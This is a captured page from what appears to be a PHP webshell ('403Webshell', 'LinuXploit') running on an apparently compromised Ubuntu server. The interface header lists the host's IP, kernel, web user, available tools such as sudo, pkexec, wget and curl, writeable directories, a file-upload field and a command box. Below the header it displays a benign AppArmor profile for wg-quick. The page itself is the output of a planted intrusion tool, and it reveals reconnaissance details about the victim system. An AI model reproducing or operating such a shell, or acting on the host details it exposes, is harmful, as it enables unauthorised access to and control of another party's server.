403Webshell
Server IP : 104.21.84.107  /  Your IP : 104.23.197.208
Web Server : Apache/2.4.63 (Ubuntu)
System : Linux adminpruebas-Virtual-Machine 6.14.0-37-generic #37-Ubuntu SMP PREEMPT_DYNAMIC Fri Nov 14 22:10:32 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 8.4.5
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /etc/apparmor.d/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /etc/apparmor.d//wg-quick
#------------------------------------------------------------------
#    Copyright (C) 2024 Canonical Ltd.
#
#    This program is free software; you can redistribute it and/or
#    modify it under the terms of version 2 of the GNU General Public
#    License published by the Free Software Foundation.
#------------------------------------------------------------------
# vim: ft=apparmor
#
abi <abi/4.0>,

include <tunables/global>

profile wg-quick /usr/bin/wg-quick flags=(attach_disconnected) {
  include <abstractions/base>
  include <abstractions/consoles>

  capability dac_read_search,
  capability net_admin,

  # Network access rules
  network netlink raw,
  network unix stream,

  # use wg aa profile 
  file mrpx /usr/bin/wg -> wg,

  # binaries called from within wg-quick
  file mrix /usr/bin/readlink,
  file mrix /usr/bin/stat,
  file mrix /usr/bin/cat,
  file mrix /usr/bin/rm,
  file mrix /usr/bin/mv,
  file mrix /usr/bin/sync,
  file mrix /usr/bin/sort,
  file mrix /usr/sbin/xtables-nft-multi,
  file mrix /usr/bin/resolvectl,
  file mrix /usr/sbin/resolvconf,

  # dbus access
  file rw @{run}/dbus/system_bus_socket,

  dbus (send)
      bus=system
      path=/org/freedesktop/resolve1
      interface=org.freedesktop.resolve1.Manager
      member="SetLink{DNSEx,Domains}"
      peer=(name=org.freedesktop.resolve1, label=unconfined),

  dbus (send)
      bus=system
      path=/org/freedesktop/DBus
      interface=org.freedesktop.DBus
      member="Hello"
      peer=(name=org.freedesktop.DBus, label=unconfined),

  # Sub-profile for nft tool restrictions
  file mrCx /usr/sbin/nft,
  profile nft /usr/sbin/nft {
    include <abstractions/base> 

    capability net_admin,

    # Allow executable mapping and read for the binary
    file mr /usr/sbin/nft,

    # Network access rules
    network netlink raw,

    file r /usr/share/iproute2/rt_realms,
    file r /usr/share/iproute2/group,
  }

  # Sub-profile for IP tool restrictions
  file mrCx /usr/bin/ip,
  profile ip /usr/bin/ip {
    include <abstractions/base>

    capability net_admin,
    capability sys_module,

    # Allow executable mapping and read for the binary
    file mr /usr/bin/ip,

    # Network access rules
    network netlink raw,

    file r /usr/share/iproute2/group,
    file r /usr/share/iproute2/rt_tables,
    file r @{run}/netns/{,**},
  }
  
  # Sub-profile for sysctl tool restrictions
  file mrCx /usr/sbin/sysctl,
  profile sysctl /usr/sbin/sysctl {
    include <abstractions/base> 
    
    # Allow executable mapping and read for the binary
    file mr /usr/sbin/sysctl,
 
    file w @{PROC}/sys/net/ipv4/conf/all/src_valid_mark,
  }

  # wireguard configuration and key files
  file rw @{etc_rw}/wireguard/{,**},

  # Allow executable mapping and read for the binary
  file mr /usr/bin/wg-quick,

  # Process-specific access
  file r @{PROC}/@{pid}/net/ip_tables_names,

  # Site-specific additions and overrides. See local/README for details.
  include if exists <local/wg-quick>
}

Youez - 2016 - github.com/yon3zu
LinuXploit